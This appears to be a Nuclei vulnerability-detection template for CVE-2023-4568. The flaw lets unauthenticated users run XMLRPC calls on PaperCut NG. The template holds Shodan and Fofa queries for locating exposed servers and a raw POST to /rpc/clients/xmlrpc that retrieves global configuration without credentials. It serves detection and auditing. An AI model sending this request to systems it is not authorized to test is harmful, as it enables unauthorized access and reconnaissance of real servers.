id: CVE-2023-4568 info: name: PaperCut NG Unauthenticated XMLRPC Functionality author: DhiyaneshDK severity: medium description: | PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: | Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4568 - https://www.tenable.com/security/research/tra-2023-31 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 epss-score: 0.78159 epss-percentile: 0.99038 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: papercut product: papercut_ng shodan-query: - html:"content=\"PaperCut\"" - http.html:'content="papercut' - cpe:"cpe:2.3:a:papercut:papercut_ng" - http.html:"content=\"papercut\"" fofa-query: - body='content="papercut' - body="content=\"papercut\"" google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut,vuln http: - raw: - | POST /rpc/clients/xmlrpc HTTP/1.1 Host: {{Hostname}} Content-Type:text/xml client.getGlobalConfigstr1str2 matchers-condition: and matchers: - type: word part: body words: - 'conf.ssl-port' - 'conf.auth-ttl-default' condition: and - type: word part: header words: - text/xml - type: status status: - 200 # digest: 490a004630440220601dd32b19113ab5191f4194ae362543bc714b364708b7d6f7cb6b5cbadfc27d02207919319a051ea178cd695275a663ab0517f640cb4cb328992e383c4ae96dede1:922c64590222798bb761d5b6d8e72950